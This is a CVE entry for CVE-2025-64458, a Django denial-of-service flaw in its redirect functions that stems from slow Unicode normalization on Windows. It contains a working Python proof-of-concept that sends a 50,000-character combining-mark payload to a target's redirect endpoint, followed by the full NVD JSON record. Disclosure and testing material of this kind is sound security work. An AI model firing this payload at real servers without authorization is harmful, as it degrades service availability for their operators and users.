CVE-2025-64458

import requests import time # CVE-2025-64458 PoC - Django Unicode DoS # Target: Django server with vulnerable redirect function def generate_unicode_payload(num_chars=10000): """Generate payload with large number of Unicode characters""" # Combining diacritical marks that trigger slow NFKC normalization payload = 'A' + ('\u0300' * num_chars) return payload def test_vulnerability(target_url): """Test if target is vulnerable to CVE-2025-64458""" payload = generate_unicode_payload(50000) # Test redirect endpoint test_url = f"{target_url}/redirect?next={payload}" start_time = time.time() try: response = requests.get(test_url, timeout=30, allow_redirects=False) elapsed = time.time() - start_time print(f"[*] Request completed in {elapsed:.2f} seconds") print(f"[*] Status code: {response.status_code}") if elapsed > 10: print("[!] Target appears VULNERABLE - response time is very slow") return True else: print("[*] Target may not be vulnerable or patched") return False except requests.exceptions.Timeout: print("[!] Request timed out - target is likely VULNERABLE") return True except Exception as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": # Replace with actual target URL target = "http://target-server.com" test_vulnerability(target)

{"cve": {"id": "CVE-2025-64458", "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "published": "2025-11-05T15:15:40.940", "lastModified": "2025-11-10T18:33:02.957", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8.\nNFKC normalization in Python is slow on Windows. As a consequence, `django.http.HttpResponseRedirect`, `django.http.HttpResponsePermanentRedirect`, and the shortcut `django.shortcuts.redirect` were subject to a potential denial-of-service attack via certain inputs with a very large number of Unicode characters.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank Seokchan Yoon for reporting this issue."}, {"lang": "es", "value": "Se descubrió un problema en 5.1 anterior a 5.1.14, 4.2 anterior a 4.2.26 y 5.2 anterior a 5.2.8. La normalización NFKC en Python es lenta en Windows. Como consecuencia, 'django.http.HttpResponseRedirect', 'django.http.HttpResponsePermanentRedirect' y el atajo 'django.shortcuts.redirect' estuvieron sujetos a un potencial ataque de denegación de servicio a través de ciertas entradas con un número muy grande de caracteres Unicode. Series de Django anteriores y no compatibles (como 5.0.x, 4.1.x y 3.2.x) no fueron evaluadas y también pueden estar afectadas. Django desea agradecer a Seokchan Yoon por informar este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.2.26", "matchCriteriaId": "5FC7EBE0-A60A-4083-9FB7-E4ADCD2B5F37"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1", "versionEndExcluding": "5.1.14", "matchCriteriaId": "9F3A5471-02DB-428E-815E-516057A901FF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.2.8", "matchCriteriaId": "F56E9016-F93A-4DAE-8070-D3A4909F00A4"}]}]}], "references": [{"url": "https://docs.djangoproject.com/en/dev/releases/security/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Vendor Advisory"]}, {"url": "https://groups.google.com/g/django-announce", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Mailing List"]}, {"url": "https://www.djangoproject.com/weblog/2025/nov/05/security-releases/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Vendor Advisory"]}]}}